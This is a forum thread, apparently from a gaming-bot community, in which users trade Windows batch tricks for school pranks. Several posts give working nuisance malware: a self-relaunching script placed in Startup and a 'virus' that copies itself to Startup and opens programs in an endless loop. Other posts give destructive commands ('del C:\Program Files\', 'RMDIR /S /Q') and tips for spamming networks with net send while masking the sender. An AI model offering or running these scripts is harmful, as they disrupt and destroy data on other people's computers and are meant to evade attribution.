Results 1 to 16 of 16

Thread: Batch...?

  1. #1
    Join Date
    Feb 2007
    Location
    FUCK YOU BRO
    Posts
    21
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default Batch...?

    asdf
    Last edited by ironlarreh; 05-13-2010 at 07:25 PM.
    If I see you autoing with level 3/default clothes/crap name I WILL report you. Auto Correctly. - put this in your sig

  2. #2
    Join Date
    Dec 2006
    Location
    utah
    Posts
    1,427
    Mentioned
    2 Post(s)
    Quoted
    7 Post(s)

    Default

    @Echo off
    Shutdown -r
    Save it as a .bat File

    Just Go To START>> RUN >>
    type in CMD then a black window will appear type in "shutdown" it will tell about it...

  3. #3
    Join Date
    Feb 2007
    Location
    FUCK YOU BRO
    Posts
    21
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    asdf
    Last edited by ironlarreh; 05-13-2010 at 07:26 PM.
    If I see you autoing with level 3/default clothes/crap name I WILL report you. Auto Correctly. - put this in your sig

  4. #4
    Join Date
    Apr 2007
    Location
    Powell River, BC
    Posts
    55
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Any command that can be executed from the shell can be executed in a batch file. Your best bet would be to page through a DOS command reference.

  5. #5
    Join Date
    Jun 2007
    Location
    New Yawk
    Posts
    943
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Naw, cmon, senior pranks have to do like 'net send' to the whole network, not just shut everything down.
    I guess the holidays are over - no sig for now.

  6. #6
    Join Date
    Dec 2006
    Location
    utah
    Posts
    1,427
    Mentioned
    2 Post(s)
    Quoted
    7 Post(s)

    Default

    Naw, cmon, senior pranks have to do like 'net send' to the whole network, not just shut everything down.
    yeah lol, at
    School i was doing "net send * Cody is Gay!!!!"
    people are like WTF?
    i love that...

  7. #7
    Join Date
    Apr 2007
    Location
    Powell River, BC
    Posts
    55
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Don't forget printing random garbage (the whole text of War and Peace, the Manifesto of the Communist Party, the entire US legal code, and don't forget WWII propaganda).

    Also, as the windows shell supports conditional statements, one might be able to write a worm as a batch file utilizing NetBIOS vulnerabilities.

  8. #8
    Join Date
    Jun 2007
    Location
    New Yawk
    Posts
    943
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    True. Infinite loop the net send message.

    A worm? Eh, safer not to, they don't want to do anything destructive, methinks.
    I guess the holidays are over - no sig for now.

  9. #9
    Join Date
    Jul 2007
    Posts
    16
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    I do know this one little trick, put this in a text file and save as virus.bat (don't be scared by the name, it's to make THEM panic, not you lol.)
    -----
    @echo off
    echo hahah lol you're boned now aintcha!
    start virus.bat
    -----

    The @echo off stops the program form repeating the directory of where the program is running from, thus making it harder to find.
    The echo haha...etc is a...personal touch....lol.
    the last line starts the program again, making a loop.

    Put this in /Start/All Programs/Startup (Just drag it and let it go.)
    Restart the pc and walk away. Quickly.

  10. #10
    Join Date
    Dec 2006
    Location
    .̿̂̔͋͗̎̆ͥ̍̒ͤ͂̾̌̀̅
    Posts
    3,012
    Mentioned
    1 Post(s)
    Quoted
    3 Post(s)

    Default

    Or just..

    Code:
    @ECHO Off
    copy %0 PATHOFSTARTUP\thenameofthefile.bat
    title uberlewtviruszomg
    :tehviruz
    ECHO z0m9 73h 1337 b47ch v1ruzzzzz!!!!!!
    start Notepad.exe
    start MSPaint.exe
    start Firefox.exe
    start %0
    GoTo tehviruz
    EDIT: Decided to explain more :P

    The @ECHO Off part was already explained in the above post..

    The ":tehviruz" part starts the loop we've made there and to repeat it we use "GoTo tehviruz" so it goes to the start of ":tehviruz".. And then we just put everything we want to be done between ":tehviruz" and "GoTo tehviruz"...

    ECHO just writes text to the command prompt..

    The copy part should copy the virus to the start up. The copying part is not in the loop so it'll copy the file only once.. and of course, copy the path of startup to "PATHOFSTARTUP" part and change "thenameofthefile" part to the name of your "virus"..

    Title should be easy to understand too.. Just sets the title to "uberlewtviruszomg" (without the "" of course).. Just change it to the title you want.

    The "start" command part should be easy to understand too.. Just starts the program chosen.. Note that you may need to add the path of the program too.. And "start %0" starts the batch file itself.. Remove "Start firefox.exe" if the computer doesn't have firefox..

    So this thing copies itself to start up and starts opening shitload of programs and the "virus" itself too so it'll open more programs.. Simple, stupid and batch And ofc this was only for learning purposes (incase someone would care about a simple and lame batch virus).

    Oh, and I'll have to add..

    Code:
    del C:\Program Files\
    That should be quite self explanitory(sp )... Just deletes the file/folder in the path you set.. Can be quite destructive That'll delete program files folder, INCASE it's at C drive.. Change incase different path if you want to use this.

  11. #11
    Join Date
    Feb 2006
    Location
    New Zealand
    Posts
    1,330
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Also depending which version of windows i.e 98 and below (if anyone still uses that anymore) deltree is possible on the windows folder. Ahaha at my university that i go to all computers are networked together. Its like a netsend war for a four hour class.

    Also depending on whether you are networked to them or not or you are just sending the batch over msn. Then telnet is best love that thing. Damn the amount of times i got screwed over by that.

  12. #12
    Join Date
    Dec 2006
    Location
    Third rock from the sun.
    Posts
    2,510
    Mentioned
    4 Post(s)
    Quoted
    1 Post(s)

    Default

    Quote Originally Posted by Pyro View Post
    Also depending which version of windows i.e 98 and below (if anyone still uses that anymore) deltree is possible on the windows folder..
    At least on Windows XP, it's this:

    Code:
    RMDIR /S /Q "Folder Tree Here"
    /S = Removes all directories and files in the specified directory
    in addition to the directory itself. Used to remove a directory
    tree.

    /Q = Quiet mode, do not ask if ok to remove a directory tree with /S

    But yeah. Pretty destructive

  13. #13
    Join Date
    Feb 2007
    Location
    FUCK YOU BRO
    Posts
    21
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    asdf
    Last edited by ironlarreh; 05-13-2010 at 07:26 PM.
    If I see you autoing with level 3/default clothes/crap name I WILL report you. Auto Correctly. - put this in your sig

  14. #14
    Join Date
    Dec 2006
    Location
    Copy pastin to my C#
    Posts
    3,788
    Mentioned
    8 Post(s)
    Quoted
    29 Post(s)

    Default

    Use cmd first to send a batch file to someone, which then sends to the teachers computer "Mrs. Teacher is a bitch!".

    This ways, the computer number wont be yours, but the one you sent bat to, even you actually are the one who sends it..

  15. #15
    Join Date
    Aug 2007
    Location
    bend down and ill show you!
    Posts
    210
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    whats batch?

  16. #16
    Join Date
    Feb 2007
    Location
    FUCK YOU BRO
    Posts
    21
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    asdf
    Last edited by ironlarreh; 05-13-2010 at 07:27 PM.
    If I see you autoing with level 3/default clothes/crap name I WILL report you. Auto Correctly. - put this in your sig

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Batch tradig Air runes...
    By SubiN in forum Magic and Prayer
    Replies: 12
    Last Post: 02-11-2012, 10:31 AM
  2. DarkStalker's RANDOM.DAT Batch File Deleter
    By drkstlkr in forum General
    Replies: 17
    Last Post: 11-03-2007, 03:12 PM
  3. Batch file
    By Bobarkinator in forum RS3 Outdated / Broken Scripts
    Replies: 8
    Last Post: 07-03-2007, 04:07 PM
  4. batch trading mith bars
    By Dark_Sniper in forum Mining and Smithing
    Replies: 8
    Last Post: 04-13-2007, 08:52 PM
  5. Batch File Question & First Post
    By snobrder in forum Bot Information and Spottings
    Replies: 1
    Last Post: 01-21-2007, 06:48 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •